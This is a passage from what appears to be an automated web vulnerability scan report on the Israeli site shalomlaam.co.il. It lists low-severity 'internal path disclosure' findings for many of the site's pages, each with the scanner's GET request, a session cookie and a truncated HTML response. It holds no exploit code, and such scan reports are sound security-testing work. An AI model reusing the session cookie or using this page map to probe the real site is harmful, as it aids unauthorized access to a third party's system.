Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.31. /reg/login.asp
http://www.shalomlaam.co.il/reg/login.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
122 / 146
Request
GET /reg/login.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/login.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.32. /search/default.asp
http://www.shalomlaam.co.il/search/default.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /search/default.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.33. /pitgam/Default.asp
http://www.shalomlaam.co.il/pitgam/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pitgam/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/pitgam/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

123 / 146
18.34. /tags/tags.asp
http://www.shalomlaam.co.il/tags/tags.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /tags/tags.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.35. /l/agrala_sheelot.asp
http://www.shalomlaam.co.il/l/agrala_sheelot.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /l/agrala_sheelot.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/l/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.36. /reg/reg.asp
http://www.shalomlaam.co.il/reg/reg.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
124 / 146
Request
GET /reg/reg.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/reg.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.37. /pagetop.asp
http://www.shalomlaam.co.il/pagetop.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pagetop.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/sipur/page.asp?CatId=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.38. /sipur/
http://www.shalomlaam.co.il/sipur/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sipur/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

125 / 146
18.39. /reg/maillingUpdate.asp
http://www.shalomlaam.co.il/reg/maillingUpdate.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /reg/maillingUpdate.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.40. /gallery/upload_img.asp
http://www.shalomlaam.co.il/gallery/upload_img.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /gallery/upload_img.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/snifim.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,,,,,,,'>
<meta name="Description" CONTENT=" ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.41. /bmidrash/bprint.asp
http://www.shalomlaam.co.il/bmidrash/bprint.asp?id=2298
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
126 / 146
Request
GET /bmidrash/bprint.asp?id=2298 HTTP/1.1
Referer: http://www.shalomlaam.co.il/bmidrash/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.42. /page/
http://www.shalomlaam.co.il/page/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /page/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.43. /hagim/3shavuot.asp
http://www.shalomlaam.co.il/hagim/3shavuot.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /hagim/3shavuot.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/news/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

127 / 146
18.44. /vod/
http://www.shalomlaam.co.il/vod/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /vod/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.45. /hagim/
http://www.shalomlaam.co.il/hagim/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /hagim/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.46. /sipur/send_sipur.asp
http://www.shalomlaam.co.il/sipur/send_sipur.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sipur/send_sipur.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/sipur/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
128 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.47. /reg/
http://www.shalomlaam.co.il/reg/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /reg/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.48. /tags/
http://www.shalomlaam.co.il/tags/?q=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /tags/?q=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.49. /komiks/
http://www.shalomlaam.co.il/komiks/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
129 / 146
Certainty
Request
GET /komiks/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.50. /sh/default.asp
http://www.shalomlaam.co.il/sh/default.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sh/default.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/sh/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.51. /komiks/Default.asp
http://www.shalomlaam.co.il/komiks/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /komiks/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/komiks/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

130 / 146
18.52. /ask/Default.asp
http://www.shalomlaam.co.il/ask/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /ask/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

, ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.53. /ask/
http://www.shalomlaam.co.il/ask/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /ask/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

, ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.54. /l/
http://www.shalomlaam.co.il/l/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /l/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
131 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.55. /gallery/
http://www.shalomlaam.co.il/gallery/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /gallery/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,,,,,,,'>
<meta name="Description" CONTENT=" ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.56. /alon/archive.asp
http://www.shalomlaam.co.il/alon/archive.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /alon/archive.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/alon/list.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.57. /ask/ask_rabbi.asp
http://www.shalomlaam.co.il/ask/ask_rabbi.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
132 / 146
Certainty
Request
GET /ask/ask_rabbi.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

, ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.58. /bmidrash/
http://www.shalomlaam.co.il/bmidrash/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /bmidrash/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

